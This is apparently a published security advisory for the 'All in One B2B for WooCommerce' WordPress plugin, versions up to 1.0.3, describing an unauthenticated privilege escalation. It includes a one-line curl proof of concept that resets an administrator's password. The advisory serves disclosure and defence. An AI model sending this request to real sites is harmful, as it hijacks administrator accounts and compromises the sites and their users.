WordPress Plugin Vulnerabilities

All in One B2B for WooCommerce <= 1.0.3 - Unauthenticated Privilege Escalation

Description

The plugin does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation.

Proof of Concept

curl 'https://example.com/' -d 'action=save_customer_details&customer_id=ADMIN_USER_ID&customer_password=NEW_PASSWORD&customer_email=ADMIN_EMAIL&customer_display_name=Foo'

Affects Plugins

References

Classification

Miscellaneous

Original Researcher
Alexander Concha
Verified
Yes

Timeline

Publicly Published
2023-09-04 (about 8 months ago)
Added
2023-09-04 (about 8 months ago)
Last Updated
2023-09-04 (about 8 months ago)

Other